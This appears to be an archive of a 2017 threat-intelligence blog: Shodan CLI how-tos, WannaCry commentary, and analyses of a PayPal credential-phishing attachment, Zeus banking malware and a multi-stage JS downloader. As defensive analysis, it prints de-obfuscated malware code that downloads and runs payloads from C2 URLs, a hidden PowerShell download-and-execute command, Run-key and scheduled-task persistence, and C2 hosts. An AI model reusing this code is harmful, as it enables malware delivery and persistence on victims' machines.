Tuesday, May 30, 2017

Python: converting Shodan CSV into IOCs CSV

This is a small script that converts the CSV downloaded from Shodan into a new CSV that is usable for ingesting into other platforms (eg. ThreatConnect etc). You can grab the IOCs column (eg. IPs) and create a new csv file with just that column - this new CSV can then be ingested into any other platform. You can pick and chose what column(s) you want to carry over into the new CSV - minor tweaks would be required. I'll keep updating this script and make it as interactive as possible - watch the gitHub repo!
Get it here.


Share:

Tuesday, May 23, 2017

Sunday, May 14, 2017

Malware: WannaCry RansomWare - Infection Vector unlikely to be Phishing

By now, the whole world has heard of the new ransomware WannaCry and its variants. Some of you might be wondering why there hasnt been anything posted here on this sire regarding the phishing aspect of the campaign. The reason is quite simple. Unlike what many security vendors have reported, it is highly unlikely that the infection is being spread through phishing campaigns. The malware is targeting victims across the world, based on the well-known SMBv1 vulnerability that was released by ShadowBrokers very recently. It is looking like the internet is being scanned for vulnerable computers and then attacked with the malware.

Easy wins: disable SMB, make sure you are not blocking the killSwitch.

There is a lot of reporting around this now but most of it is just re-tweets and news stories which add little to nothing to the real campaign.

Here's a good RE paper from Jake Williams on the payload.
And here's the tool that you can use to prevent WannaCry infections if you cant patch your systems.


Share:

Wednesday, May 10, 2017

Tuesday, May 9, 2017

Phishing: PayPal theme 10 May 2017 | CredSteal

Originally published in PhishCentral

This one is active currently - trying to lure victims into downloading and opening a HTML file, that fires up locally in the browser but POSTs information online, back to the c2 when the 'submit' button is hit, if the information matches the conditions in the script.
This what the email body looks like. 

The HTML Attachment


Clever JS in the background makes the connection. It is obfuscated. 
The actual HTML content only loads if internet is available. The JS fetches the page contents and then displays them in the browser. 

Locally saved html, loaded into a browser with internet avaialble

The actual content is served from this server:  www.infosec1.net

PCAP of the request in the background

The content served

The whole HTML is encrypted and is only decrypted on the go in the browser. When decrypted, we can see the JS code that executes in the browser. 

Decrypted Code

The JS code is clever and checks for a few conditions. If the conditions are met, it POSTs the info to the c2 - http://www.bootstrapcdn3.net/e0445952.php and if the conditions are not met, it re-directs to legit PayPal site. 

One of the conditions. 

Final condition that directs the traffic


IOCs for this:
www.infosec1.net
www.bootstrapcdn3.net
3061027594cf895b2e4a7ca0000f6bfe


:)
Share:

Using Shodan CLI | Downloading malware IOCs

I started using then Shodan CLI for personal research into malware c2 hosts and found the new shodan tool malwareHunter to be very helpful.
Thought I'd share with you guys how I use the API to grab the IOCs and then convert the JSON report into a CSV, which could then be used in many ways.

All of this is happening AFTER Shodan API keys have been successfully initialised (described in a post earlier).

First up, simply fire up the shodan CLI to download the indicators by running the command below.

Syntax:
$ shodan download --limit [number of results you want eg. 1000] filename [whatever you want to call it. eg. malware-iocs-date category:malware

Example:
$ shodan download --limit 1000 malware category:malware











This should dump the results for you in a JSON format file.
Next, if you want to, convert the results into a CSV:

$ shodan convert malware.json.gz csv

That's it. It'll dump a CSV version of the file for you to use whatever way you want to. 

:)
Share:

Thursday, May 4, 2017

Installing the Shodan CLI

UPDATE:
I've released a python tool that downloads, installs and initiates Shodan CLI - you can get it on github. More details in this post: http://rakshatec.blogspot.com.au/2017/05/free-tool-for-installing-shodan-cli.html

Here's a step-by-step guide for installing the Shodan CLI - very useful if you want to download data using commands instead of the browser. I looked around the internet for something like this but couldn't find anything so thought I'd chuck this one on here.

You need Python installed to get started.
Once you have Python installed and ready to go, follow these steps. Depending on what you have and haven't got installed already, some steps might not be required.

First of all install the  PIP:

$ sudo apt install python-pip









Once PIP is installed, go for Shodan!

$ pip install shodan













Good to go:












Now its time to initialize your API Key - you can get that key from your shodan.io account.
Use this command to initialize the key:

$ shodan init YOUR_API_KEY




You should be good to go from here on.
For more commands, have look here - https://cli.shodan.io/

:)

Share:

Friday, April 28, 2017

News: Another Day, Another Obfuscation Technique




SANS ISC:
We got many samples from our readers and we thank them for this. It helps us to find how attackers are improving their techniques to bypass security controls and to fool the victims. Often the provided samples are coming from common "waves" of spam but, sometimes, they are interesting. I'm also collecting pieces of malware via my honeypot and yesterday I detected a Word document with a very low score on VT:

Read the full story here.
Share:

Sunday, April 23, 2017

Malware - Zeus | Apr 2017

Here're some of the characteristics of a current version of the Zeus Banking Malware.

Upon execution, the process that is spawned is explorer.exe which then executes and does the job.


PDB files (from memory, not all are created by the malware):


explorer.pdb
ntdll.pdb
kernel32.pdb
kernelbase.pdb
RSDSqc
apphelp.pdb
msvcrt.pdb
RSDS~S
oleaut32.pdb
RSDSzNh
combase.pdb
RSDS,9%
powrprof.pdb
advapi32.pdb
RSDSGk
user32.pdb
gdi32.pdb
shcore.pdb
RSDSB*
shlwapi.pdb
shell32.pdb
RSDSmEi? r
UxTheme.pdb
dwmapi.pdb
twinapi.pdb
d3d11.pdb
dcomp.pdb
sspicli.pdb
sechost.pdb
userenv.pdb
propsys.pdb
rpcrt4.pdb
SLC.pdb
profapi.pdb
dxgi.pdb
sppc.pdb
imm32.pdb
msctf.pdb
ws2_32.pdb
nsi.pdb
RSDSS=[
dnsapi.pdb
RSDS}=
wininet.pdb
iertutil.pdb
cryptsp.pdb
rsaenh.pdb
bcrypt.pdb
cryptbase.pdb
bcryptprimitives.pdb
secur32.pdb
OnDemandConnRouteHelper.pdb
Kernel.Appcore.pdb
winhttp.pdb
urlmon.pdb
ole32.pdb
RSDS9h
mswsock.pdb
iphlpapi.pdb
RSDSh1
winnsi.pdb
rasadhlp.pdb
RSDSuY
fwpuclnt.pdb
comctl32.pdb

C2 information:


Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
HTTP/1.1
Connection: close
urlmon.dll
ObtainUserAgentString
185.121.177.53
185.121.177.177
45.63.25.55
111.67.16.202
142.4.204.111
142.4.205.47
31.3.135.232
62.113.203.55
37.228.151.133
144.76.133.38


HTTP connections:


http://health.worldwidecons.ltd/index.php
Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
health.worldwidecons.ltd
/index.php

health.worldwidecons.ltd
health.worldwidecons.ltd
C:\Windows\System32\rasadhlp.dll
health.worldwidecons.ltd
health.worldwidecons.ltd
LRPC-4ad3f41e1dd17fdfd8
LRPC-4ad3f41e1dd17fdfd8
LRPC-ce28dc8b8c59856b80
Accept: */*
UserName
health.worldwidecons.ltd
Host: health.worldwidecons.ltd
POST /index.php HTTP/1.1
health.worldwidecons.ltd
health.worldwidecons.ltd

http://health.worldwidecons.ltd/index.php
qqqqqqqqqqqqqqqq
health.worldwidecons.ltd
POST /index.php HTTP/1.1
Host: health.worldwidecons.ltd
dtl.snocediwdlrow.htlaeh
health.worldwidecons.ltd
POST /index.php HTTP/1.1
health.worldwidecons.ltd
Host: health.worldwidecons.ltd
health.worldwidecons.ltd
POST /index.php HTTP/1.1
dtl.snocediwdlrow.htlaeh
Host: health.worldwidecons.ltd
POST /index.php HTTP/1.1
POST /index.php HTTP/1.1
health.worldwidecons.ltd
health.worldwidecons.ltd

System info sent back to the C2:


ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\User\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=WIN-P63U3EMH5QC
ComSpec=C:\Windows\system32\cmd.exe
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=\Users\User
LOCALAPPDATA=C:\Users\User\AppData\Local
LOGONSERVER=\\WIN-P63U3EMH5QC
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Path=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 70 Stepping 1, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=4601
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files
PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
PUBLIC=C:\Users\Public
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\User~1\AppData\Local\Temp
TMP=C:\Users\User~1\AppData\Local\Temp
USERDOMAIN=WIN-P63U3EMH5QC
USERDOMAIN_ROAMINGPROFILE=WIN-P63U3EMH5QC
USERNAME=User
USERPROFILE=C:\Users\User
windir=C:\Windows

Misc information (can be used as IOCs):


Cookie:username@windowssearch.com/
Cookie:username@wireshark.org/

Connection: close
X-Powered-By: PHP/5.4.45-0+deb7u2



<!ENTITY RightTeeArrow "&#x21A6;">
<!ENTITY mapsto "&#x21A6;">
<!ENTITY DownTeeArrow "&#x21A7;">
<!ENTITY mapstodown "&#x21A7;">
<!ENTITY larrhk "&#x21A9;">
<!ENTITY hookleftarrow "&#x21A9;">
<!ENTITY rarrhk "&#x21AA;">
<!ENTITY hookrightarrow "&#x21AA;">
<!ENTITY larrlp "&#x21AB;">
<!ENTITY looparrowleft "&#x21AB;">
<!ENTITY rarrlp "&#x21AC;">
<!ENTITY looparrowright "&#x21AC;">
<!ENTITY harrw "&#x21AD;">
<!ENTITY leftrightsquigarrow "&#x21AD;">
<!ENTITY nharr "&#x21AE;">
<!ENTITY nleftrightarrow "&#x21AE;">


Websites targeted:


The list is very long - they are not leaving any industry out!
Here's just one snippet:


aa.net.nz
aafes.com
abm-energie.de
accretivehealth.com
aceinsurance.com.au
action-inter.com
activedocs.com
aeat.co.uk
afimilk.co.il
aftonxchange.com
agencerecherche.fr
agencywow.com
akd.nl
aksel.com.tr
albil.com.tr
allianz.hr
alturkigroup.net
ana.co.jp
aproposgeschenk.de

Here's one of the downloader de-obfuscated script BTW:

The code below is the part that grabs the payload from the c2 and executes it.
---------------------------
Windows Script Host
---------------------------
var wsh = new ActiveXObject("wscript.shell");

var sh = new ActiveXObject("shell.application");

var HTTP = new ActiveXObject("MSXML2.XMLHTTP");

var Stream = new ActiveXObject("ADODB.Stream");

var path = wsh.SpecialFolders("Templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";

HTTP.Open("GET", "http://forum.glotran.club/rXKAdoWqgi.php", false); HTTP.Send(); if (HTTP.Status == 200) {

Stream.Open(); Stream.Type = 1; Stream.Write(HTTP.ResponseBody);

Stream.Position = 0; Stream.SaveToFile(path, 2);

Stream.Close(); sh.ShellExecute(path, "", "", "open", 1); }
---------------------------


Share:

Thursday, April 20, 2017

Malware - JS Downloaders: Amazon Delivery Theme | APR 2017

This is one of the more interesting JS down-loaders that I've come across recently. The fact that it downloads another script that carries out the final download of the payload is different to what we normally see. As to why exactly it is doing that, not sure. Just an extra layer.
The code in the second download is encrypted by a running XOR and is decrypted on execution. The following shots describe the flow of the campaign.

I've included the text versions of the interesting parts from the scripts, with comments, at the end of the post.

This is a screenshot of the first stage JS code - that, quite literally, downloads another JS file and then executes it to get the payload.

First Stage JS
Below is the 'beautified' version of the same code above.

First Stage Beautified


So below is the output of the selected code that I modified a bit and printed out using the 'console.log' method: 

First Stage Debugging

Executing the modified code gives us the URLs for the second-stage JS script:
First Stage execution results

The downloaded JS is saved in the USER directory and runs it:
Second Stage code

Now we go through the actual code that is executed to download the payload. Things get interesting around here. The actual code is encrypted, using a running XOR - decryption happens on execution. Once de-crypted, the code is executed and the payload is downloaded and executed. Again, I've used the console.log method to print out the de-crypted version of the code and other interesting bits following that. 

Second stage debugging

Below is a screenshot of the de-crypted code after the execution takes place - this is the code that will check a few things on the host system and execute a couple of loops and then eventually download the payload. 

Second Stage Results

Below is the code extracted after de-cryption for the second stage downloader:

Second Stage CODE

Below is the final JS code that will download the payload from the malNet:
Final JS Code


Here is the final JS code with interesting bits in comments:

Snippet #1

var ZGncoNX = new ActiveXObject('WScript.Shell');
var yiwUiaBBet = 600000;
//////CPwSorFGbw9A
//////5f2PK8sWYO22cgXwhsZX
var XvHMKvYV = "http://www.volf.de/term.php";
var xDUceoXahcbBJx0 = ZGncoNX.ExpandEnvironmentStrings('%PROCESSOR_REVISION%');

var xDUceoXahcbBJx1   = "u1"

var xDUceoXahcbBJx2 = ZGncoNX.ExpandEnvironmentStrings('%PROCESSOR_REVISION%%PROCESSOR_ARCHITECTURE%%COMPUTERNAME%%USERNAME%');
//////wK3LkavxMH
//////ffYP3PnSvRGt
WScript.Echo('x2 in this code is =' + xDUceoXahcbBJx2);
xDUceoXahcbBJx2 += xDUceoXahcbBJx;
var xDUceoXahcbBJx3 = "";
//////UP1WM4uKv
//////9SuE9DJo4Ar9knha6L
for (var xDUceoXahcbBJx4 = 0; xDUceoXahcbBJx4 < xDUceoXahcbBJx2.length; xDUceoXahcbBJx4++) {
xDUceoXahcbBJx3 += xDUceoXahcbBJx2.charCodeAt(xDUceoXahcbBJx4).toString(16);
};



/* ---------------------------
 xDUceoXahcbBJx3 - this is the ID that is sent back to the C2:
---------------------------
3436303178383657494e2d5036335533454d4835514356697368616c205468616b7572
---------------------------

 */

Snippet #2

ZGncoNX.Run('REG ADD "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /V "' + xDUceoXahcbBJx0 + '0" /t REG_SZ /F /D "cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile(\'' + XvHMKvYV + '?cmd=d\',\'%userprofile%\\' + xDUceoXahcbBJx0 + '.js\'); %userprofile%\\' + xDUceoXahcbBJx0 + '.js"', 0, false);

/* ---------------------------
ZGncoNX.Run - OUTPUT:
---------------------------
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "46010" /t REG_SZ /F /D "cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile('http://www.volf.de/term.php?cmd=d','%userprofile%\4601.js'); %userprofile%\4601.js"
---------------------------
 */


Snippet #3

ZGncoNX.Run('REG ADD "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /V "' + xDUceoXahcbBJx0 + '1" /t REG_SZ /F /D "%userprofile%\\' + xDUceoXahcbBJx0 + '.js"', 0, false);

/* 
---------------------------
ZGncoNX.Run
---------------------------
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "46011" /t REG_SZ /F /D "%userprofile%\4601.js"
---------------------------
 */

Snippet #4

ZGncoNX.Run('SCHTASKS /Create /TN ' + xDUceoXahcbBJx0 + ' /SC DAILY /F /TR %userprofile%\\' + xDUceoXahcbBJx0 + '.js', 0, false);

/* ---------------------------
ZGncoNX.Run
---------------------------
SCHTASKS /Create /TN 4601 /SC DAILY /F /TR %userprofile%\4601.js
---------------------------
 */

Snippet #5

This one is the XOR encrypted code:
something like this:

xDUceoXahcbBJx5.WriteText('var UDyUWGgURHBZ = "\\x3e\\x17\\x41\\x64\\x1d\\x0f\\x7e\\x45\\x6d\\x20\\x22\\x58\\x2b\\x07\\x3f\\x46\\x64\\x45\\x68\\x13\\x12\\x0c\\.......


Snippet #6

xDUceoXahcbBJx6.open('GET', XvHMKvYV + '?cmd=p&id=' + xDUceoXahcbBJx3 + '&group=' + xDUceoXahcbBJx1 + '&os=' + xDUceoXahcbBJx + '&rnd=' + Math.random(), false);
/* ---------------------------
EndResult:
---------------------------
http://www.volf.de/term.php?cmd=p&id=3436303178383657494e2d5036335533454d4835514356697368616c205468616b7572&group=u1&os=&rnd=0.06770346768653279
---------------------------

 */


That's all. 
:)
Share:

Tuesday, February 7, 2017